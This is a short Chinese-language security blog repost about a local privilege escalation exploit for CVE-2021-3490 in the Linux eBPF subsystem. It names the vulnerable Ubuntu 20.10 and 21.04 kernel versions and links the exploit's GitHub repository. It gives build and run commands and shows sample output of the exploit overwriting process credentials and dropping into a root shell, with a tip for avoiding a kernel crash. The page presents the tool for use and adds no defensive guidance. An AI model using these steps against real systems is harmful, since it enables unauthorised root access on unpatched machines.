Linux_LPE_eBPF_CVE-2021-3490

  • A+
所属分类:安全漏洞


Linux_LPE_eBPF_CVE-2021-3490


        针对 CVE-2021-3490 的 LPE 漏洞利用。在 Ubuntu 20.10 (Groovy Gorilla) 内核 5.8.0-25.26 到 5.8.0-52.58 上测试。和 Ubuntu 21.04 (Hirsute Hippo) 5.11.0-16.17。


https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490

用法:

为 Ubuntu 20.10 (Groovy Gorilla) 构建:


make groovy

为 Ubuntu 21.04 (Hirsute Hippo) 构建:


make hirsute

运行:


bin/exploit.bin[+] eBPF enabled, maps created![+] addr of oob BPF array map: ffffa008c1202110[+] addr of array_map_ops: ffffffff956572a0[+] kernel read successful![!] searching for init_pid_ns in kstrtab ...[+] addr of init_pid_ns in kstrtab: ffffffff95b03a4a[!] searching for init_pid_ns in ksymtab...[+] addr of init_pid_ns ffffffff96062d00[!] searching for creds for pid: 770[+] addr of cred structure: ffffa0086758dec0[!] preparing to overwrite creds...[+] success! enjoy r00t :)#

注意:您必须通过键入exit执行清理并避免内核崩溃来干净地退出 root shell 




本文始发于微信公众号(Khan安全攻防实验室):Linux_LPE_eBPF_CVE-2021-3490

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: